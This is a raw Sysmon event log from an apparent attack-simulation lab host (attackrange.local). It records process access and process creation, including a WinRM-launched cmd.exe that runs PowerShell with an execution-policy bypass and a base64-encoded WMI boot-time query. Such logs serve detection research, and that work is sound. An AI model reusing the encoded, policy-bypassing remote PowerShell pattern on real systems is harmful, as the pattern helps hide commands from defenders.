13:33:22.216{59A5CD1D-8E22-6005-DC02-00000000A201}45364408C:\Windows\system32\cmd.exe{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.229{59A5CD1D-8E22-6005-DD02-00000000A201}3540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E22-6005-CF16-110000000000}0x1116cf0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E22-6005-DC02-00000000A201}4536C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8E22-6005-DB02-00000000A201}24481708C:\Windows\system32\conhost.exe{59A5CD1D-8E22-6005-DC02-00000000A201}4536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E22-6005-DC02-00000000A201}4536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8E22-6005-DA02-00000000A201}44601432C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E22-6005-DC02-00000000A201}4536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.223{59A5CD1D-8E22-6005-DC02-00000000A201}4536C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E22-6005-CF16-110000000000}0x1116cf0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E22-6005-DA02-00000000A201}4460C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.216{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.153{59A5CD1D-8CA9-6005-1300-00000000A201}12682032C:\Windows\system32\svchost.exe{59A5CD1D-8E22-6005-DA02-00000000A201}4460C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.153{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E22-6005-DA02-00000000A201}4460C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.138{59A5CD1D-8E22-6005-DB02-00000000A201}24481708C:\Windows\system32\conhost.exe{59A5CD1D-8E22-6005-DA02-00000000A201}4460C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E22-6005-DB02-00000000A201}2448C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.122{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|